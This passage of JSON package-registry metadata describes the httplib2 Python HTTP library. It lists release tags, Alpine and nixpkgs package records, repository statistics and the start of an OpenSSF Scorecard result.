tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T23:57:46.405Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":11.740062839758615,"forks_count":7.1068774624707,"docker_downloads_count":null,"average":4.711735075557328},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.18","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":280,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-05-23T07:13:03.061Z","updated_at":"2023-05-23T07:13:03.061Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.18","url":"https://pkgs.alpinelinux.org/packages?branch=v3.18","ecosystem":"alpine","default":false,"packages_count":20068,"maintainers_count":367,"namespaces_count":2,"keywords_count":3639,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1238},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-05-22T10:43:30.622Z","updated_at":"2026-08-22T05:06:15.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/namespaces"}},{"id":12828055,"name":"python311Packages.httplib2","ecosystem":"nixpkgs","description":"A comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T19:18:57.325Z","latest_release_published_at":"2026-01-26T19:18:57.325Z","latest_release_number":"0.21.0","last_synced_at":"2026-04-03T09:26:49.356Z","created_at":"2026-01-26T19:18:57.175Z","updated_at":"2026-08-22T00:56:11.963Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=python311Packages.httplib2","install_command":"nix-env -iA nixpkgs.python311Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/python-modules/httplib2/default.nix#L74","metadata":{"nix_attribute":"python3.11-httplib2-0.21.0","position":"pkgs/development/python-modules/httplib2/default.nix:74","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project 